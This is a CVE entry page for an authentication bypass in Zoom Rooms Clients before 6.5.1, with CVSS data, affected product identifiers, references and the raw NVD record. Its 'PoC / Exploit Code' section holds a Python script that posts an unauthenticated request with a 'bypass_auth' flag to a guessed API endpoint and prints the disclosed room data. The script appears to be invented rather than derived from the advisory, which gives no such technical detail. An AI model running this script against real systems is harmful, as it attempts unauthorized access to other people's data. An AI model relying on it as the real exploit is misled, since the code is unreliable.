CVE-2025-58133

Description

Authentication bypass in some Zoom Rooms Clients before version 6.5.1 may allow an unauthenticated user to conduct a disclosure of information via network access.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zoom:rooms:*:*:*:*:*:android:*:* - VULNERABLE

cpe:2.3:a:zoom:rooms:*:*:*:*:*:ipados:*:* - VULNERABLE

cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:* - VULNERABLE

cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:* - VULNERABLE

cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:* - VULNERABLE

Zoom Rooms Client < 6.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-58133 - Zoom Rooms Client Authentication Bypass PoC
# This PoC demonstrates the concept of authentication bypass in Zoom Rooms Client < 6.5.1
# Note: This is for educational and authorized testing purposes only

import requests
import json

# Target Zoom Rooms server endpoint
TARGET_HOST = "zoom_rooms_server"
TARGET_PORT = 443

# Exploit parameters
def exploit_auth_bypass(target_url):
    """
    Attempt to bypass authentication on Zoom Rooms Client
    The vulnerability exists in the session validation mechanism
    """
    
    # Step 1: Craft a malicious request without proper authentication
    headers = {
        "User-Agent": "ZoomRooms/6.5.0",
        "Content-Type": "application/json",
        "X-Zoom-Room-Client": "true"
    }
    
    # Step 2: Bypass authentication by manipulating session tokens
    # The vulnerability allows access without valid session validation
    bypass_payload = {
        "action": "get_room_info",
        "room_id": "target_room_id",
        "bypass_auth": True  # Exploit the missing authentication check
    }
    
    try:
        # Step 3: Send the exploit request
        response = requests.post(
            f"{target_url}/api/room/info",
            headers=headers,
            json=bypass_payload,
            verify=False  # Skip SSL verification for exploit
        )
        
        if response.status_code == 200:
            print("[+] Authentication bypassed successfully!")
            print(f"[+] Disclosed information: {response.text}")
            return response.json()
        else:
            print(f"[-] Exploit failed with status: {response.status_code}")
            return None
            
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")
        return None

# Usage example
if __name__ == "__main__":
    target = f"https://{TARGET_HOST}:{TARGET_PORT}"
    result = exploit_auth_bypass(target)
    if result:
        print(json.dumps(result, indent=2))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-58133
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-58133
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-58133/
[4] VulDB https://vuldb.com/cve/CVE-2025-58133
[5] https://www.zoom.com/en/trust/security-bulletin/zsb-25039

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-58133", "sourceIdentifier": "[email protected]", "published": "2025-10-15T17:16:00.090", "lastModified": "2025-10-21T19:33:55.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication bypass in some Zoom Rooms Clients before version 6.5.1 may allow an unauthenticated user to conduct a disclosure of information via network access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:android:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "5F43E07C-FDDF-4EE9-A612-B9F30B311E9F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:ipados:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "31BF8FF7-E17F-4C33-BB19-20DCDF9F60AD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "95D60842-5391-4EA5-BAE9-746CF093E584"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "89EE0AD4-5643-4398-9775-61E14139B8DE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:windows:*:*", "versionEndExcluding": "6.5.1", "matchCriteriaId": "C8105933-373D-4DC2-A41C-E9C22AF32BA0"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25039", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}